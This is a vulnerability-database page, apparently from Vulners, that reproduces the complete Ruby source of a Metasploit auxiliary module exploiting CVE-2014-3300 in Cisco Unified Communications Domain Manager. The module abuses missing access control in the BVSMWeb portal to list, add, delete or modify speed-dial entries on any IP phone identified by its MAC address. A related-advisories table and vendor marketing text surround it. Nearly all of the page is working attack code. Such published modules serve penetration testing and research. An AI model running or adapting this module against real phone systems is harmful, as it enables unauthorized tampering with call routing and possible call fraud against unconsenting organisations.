Lucene search
K

Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool

🗓️ 10 Jan 2015 06:29:28Reported by fozavciType 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

Viproy CUCDM XML Services Speed Dial Attac

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-3300
29 May 201815:50
circl
CVE
CVE-2014-3300
7 Jul 201410:00
cve
Cvelist
CVE-2014-3300
7 Jul 201410:00
cvelist
Metasploit
Viproy CUCDM IP Phone XML Services - Call Forwarding Tool
10 Jan 201506:28
metasploit
NVD
CVE-2014-3300
7 Jul 201411:01
nvd
Packet Storm
Viproy CUCDM IP Phone XML Services Speed Dial Attack Tool
31 Aug 202400:00
packetstorm
Packet Storm
Viproy CUCDM IP Phone XML Services Call Forwarding Tool
31 Aug 202400:00
packetstorm
Prion
Improper access control
7 Jul 201411:01
prion
securityvulns
Cisco Unified Communications Domain Manager multiple security vulnerabilities
4 Aug 201400:00
securityvulns
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
      'Description'   => %q{
        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
        (CDM), before version 10, doesn't implement access control properly, which allows remote
        attackers to modify user information. This module exploits the vulnerability to make
        unauthorized speed dial entity manipulations.
      },
      'Author'        => 'fozavci',
      'References'    =>
        [
          ['CVE', '2014-3300'],
          ['BID', '68331']
        ],
      'License'       => MSF_LICENSE,
      'Actions'       =>
        [
          [ 'List',   { 'Description' => 'Getting the speeddials for the MAC address' } ],
          [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
          [ 'Add',    { 'Description' => 'Adding a speeddial for the MAC address' } ],
          [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
        ],
      'DefaultAction'  => 'List'
    ))

    register_options(
    [
      OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
      OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
      OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
      OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
      OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
    ])
  end

  def run

    case action.name.upcase
      when 'MODIFY'
        modify
      when 'DELETE'
        delete
      when 'ADD'
        add
      when 'LIST'
        list
    end

  end

  def send_rcv(uri, vars_get)
    uri = normalize_uri(target_uri.to_s, uri.to_s)
    res = send_request_cgi(
      {
        'uri'    => uri,
        'method' => 'GET',
        'vars_get' => vars_get
      })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/
      return Exploit::CheckCode::Vulnerable, res
    else
      print_error("Target appears not vulnerable!")
      return Exploit::CheckCode::Safe, res
    end
  end

  def parse(res)
    doc = REXML::Document.new(res.body)
    names = []
    phones = []

    list = doc.root.get_elements('DirectoryEntry')
    list.each do |lst|
      xlist = lst.get_elements('Name')
      xlist.each {|l| names << "#{l[0]}"}
      xlist = lst.get_elements('Telephone')
      xlist.each {|l| phones << "#{l[0]}" }
    end

    if names.size > 0
      names.size.times do |i|
        info = ''
        info << "Position: #{names[i].split(":")[0]}, "
        info << "Name: #{names[i].split(":")[1]}, "
        info << "Telephone: #{phones[i]}"

        print_good("#{info}")
      end
    else
      print_status("No Speed Dial detected")
    end
  end

  def list
    mac = datastore['MAC']

    print_status("Getting Speed Dials of the IP phone")
    vars_get = {
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('speeddials.cgi', vars_get)
    parse(res) unless status == Exploit::CheckCode::Safe
  end

  def add
    mac = datastore['MAC']
    name = datastore['NAME']
    position = datastore['POSITION']
    telno = datastore['TELNO']

    print_status("Adding Speed Dial to the IP phone")
    vars_get = {
      'name' => "#{name}",
      'telno' => "#{telno}",
      'device' => "SEP#{mac}",
      'entry' => "#{position}",
      'mac' => "#{mac}"
    }
    status, res = send_rcv('phonespeedialadd.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
      print_good("Speed Dial #{position} is added successfully")
    elsif res && res.body && res.body.to_s =~ /exist/
      print_error("Speed Dial is exist, change the position or choose modify!")
    else
      print_error("Speed Dial couldn't add!")
    end
  end

  def delete
    mac = datastore['MAC']
    position = datastore['POSITION']

    print_status("Deleting Speed Dial of the IP phone")

    vars_get = {
      'entry' => "#{position}",
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
      print_good("Speed Dial #{position} is deleted successfully")
    else
      print_error("Speed Dial is not found!")
    end
  end

  def modify
    mac = datastore['MAC']
    name = datastore['NAME']
    position = datastore['POSITION']
    telno = datastore['TELNO']

    print_status("Deleting Speed Dial of the IP phone")

    vars_get = {
      'entry' => "#{position}",
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
      print_good("Speed Dial #{position} is deleted successfully")
      print_status("Adding Speed Dial to the IP phone")

      vars_get = {
        'name' => "#{name}",
        'telno' => "#{telno}",
        'device' => "SEP#{mac}",
        'entry' => "#{position}",
        'mac' => "#{mac}"
      }

      status, res = send_rcv('phonespeedialadd.cgi', vars_get)

      if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
        print_good("Speed Dial #{position} is added successfully")
      elsif res && res.body =~ /exist/
        print_error("Speed Dial is exist, change the position or choose modify!")
      else
        print_error("Speed Dial couldn't add!")
      end
    else
      print_error("Speed Dial is not found!")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation